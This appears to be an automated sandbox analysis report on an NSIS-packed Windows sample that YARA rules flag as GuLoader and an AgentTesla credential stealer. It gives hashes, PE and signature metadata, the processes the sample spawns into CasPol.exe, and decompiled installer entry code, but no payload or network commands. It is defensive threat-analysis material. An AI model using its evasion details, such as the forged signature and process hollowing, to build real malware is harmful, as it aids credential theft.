SSDEEP:	24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
MD5:	5343C1A8B203C162A3BF3870D9F50FD4
SHA1:	04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
SHA-256:	DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
SHA-512:	E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
Malicious:	false
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

\Device\ConDrv

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Preview:	NordVPN directory not found!..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.737885668413826
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
File size:	150224
MD5:	09d431a8321ec75d7ff057787c319897
SHA1:	b709d7968897d774676194b9708f304a6a472086
SHA256:	1be03967a615254ca0b3eba8b5aaa6b5f5c91c9f03d4fe2692b3675f93c0b26d
SHA512:	da58f66d20a061f973ce18c894d00279a5b47f8e49b09fd08a6f17ac9c42a806d857709c6e89e30ebe8b4d124a11c15df80459579ffe5ac751a7c80f5798c925
SSDEEP:	3072:AfY/TU9fE9PEtu22bTj/eZsl2JhPa0TeYFv8YARZ/KtWquoJTvJfS:WYa6LTkXPderR9KLLvJ
TLSH:	CAE3F1147770E8A3F9731B71AE7597A6AFB2EA021875974F13202A9C3D91380DB1D713
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

File Icon


Icon Hash:	9ad8d87078697939

Static PE Info

General

Entrypoint:	0x403640
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	61259b55b8912888e90f516ca08dc514

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Hovedbundens1 alerters SPORTELLNNEDE Bowenite ", O=neglecting, L=Myrtle, S=Mississippi, C=US
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	23/05/2022 15:12:19 23/05/2023 15:12:19
Subject Chain	CN="Hovedbundens1 alerters SPORTELLNNEDE Bowenite ", O=neglecting, L=Myrtle, S=Mississippi, C=US
Version:	3
Thumbprint MD5:	C16E17A3C8D303B21C04B936BB6E0DCB
Thumbprint SHA-1:	08759A518D93EEE4FA4E210966C67D44DAFF49A8
Thumbprint SHA-256:	DB0429D568507771A725F6E9BCCA1523C3D67F56B97DB4214D1703A8779161C1
Serial:	FE464BE9561F856B

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A230h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080C8h]
mov esi, dword ptr [004080CCh]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F73D05E5BEAh
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F73D05E5BBAh
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [0042A318h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x53000	0x14d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x22c08	0x1ec8	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6676	0x6800	False	0.656813401442	data	6.41745998719	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x139a	0x1400	False	0.4498046875	data	5.14106681717	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20378	0x600	False	0.509765625	data	4.11058212765	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x2b000	0x28000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x53000	0x14d0	0x1600	False	0.302734375	data	3.56713195596	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x53208	0x8a8	data	English	United States
RT_DIALOG	0x53ab0	0x100	data	English	United States
RT_DIALOG	0x53bb0	0x11c	data	English	United States
RT_DIALOG	0x53cd0	0xc4	data	English	United States
RT_DIALOG	0x53d98	0x60	data	English	United States
RT_GROUP_ICON	0x53df8	0x14	data	English	United States
RT_VERSION	0x53e10	0x37c	data	English	United States
RT_MANIFEST	0x54190	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Version Infos

Description	Data
LegalCopyright	Copyright 1997-2013, Nullsoft, Inc.
FileVersion	10.28.31
CompanyName	Thermo Electron Corporation
LegalTrademarks	StringFileInfo: U.S. English
Comments	VF Corporation
ProductName	Prudential Financial Inc.
FileDescription	LegalTrademarks,Nullsoft and Winamp are trademarks of Nullsoft, Inc.
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

⊘No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exePID: 8408, Parent PID: 6772

General

Target ID:	0
Start time:	21:03:58
Start date:	23/05/2022
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe"
Imagebase:	0x400000
File size:	150224 bytes
MD5 hash:	09D431A8321EC75D7FF057787C319897
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 8888, Parent PID: 8408

General

Target ID:	10
Start time:	21:04:15
Start date:	23/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe"
Imagebase:	0x2b0000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 3104, Parent PID: 8408

General

Target ID:	11
Start time:	21:04:16
Start date:	23/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe"
Imagebase:	0x190000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 376, Parent PID: 8408

General

Target ID:	12
Start time:	21:04:16
Start date:	23/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe"
Imagebase:	0xa80000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000000.1265287486.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.6152117405.000000001D5A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.6152117405.000000001D5A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.6152117405.000000001D5A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3384, Parent PID: 376

General

Target ID:	13
Start time:	21:04:16
Start date:	23/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70de00000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exePID: 8408, Parent PID: 6772COMMON

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	4.4%
Signature Coverage:	22.1%
Total number of Nodes:	895
Total number of Limit Nodes:	43

Executed Functions

Function 00403640 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t180 = E00406A35(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E004069C5(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t189,  &_v1016, 0x2b4, _t189); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe\" ";
				E00406668(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x42a260 = 0x400000;
				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00435002;
				}
				_t199 = CharNextW(E00405F64(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405F64(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t199);
										L37:
										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E0040360F(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403C25();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x42a2f4 == _t189) {
														L77:
														_t120 =  *0x42a30c;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E00406A35(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t189) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t265);
												goto L68;
											}
											_t219 = E00405F64(L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe\" ") {
													_t190 = E00405C33(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t220 = L"C:\\Users\\Arthur\\Desktop";
													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Arthur\\Desktop");
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t220);
														}
														E00406668(0x42b000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x42b800 = _t144;
														do {
															E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe", 0x420f08, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E00406428(_t202, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t153 = E00405C4B(0x420f08);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E0040603F(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
												E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E0040360F(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E0040360F(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}

0x0040364e
0x0040364f
0x00403656
0x00403659
0x00403660
0x00403663
0x00403676
0x0040367c
0x0040367f
0x00403682
0x00403690
0x00403698
0x004036a3
0x004036bc
0x004036be
0x004036c6
0x004036c6
0x004036d1
0x004036d3
0x004036d3
0x004036e8
0x0040370d
0x0040371b
0x0040371e
0x00403725
0x0040372c
0x0040372c
0x00403725
0x0040372e
0x00403733
0x00403734
0x00403740
0x00403744
0x0040374b
0x00403759
0x0040375e
0x00403765
0x00403769
0x0040376d
0x0040376f
0x0040376f
0x0040376d
0x00403776
0x0040377d
0x00403783
0x0040379b
0x004037ab
0x004037b0
0x004037b6
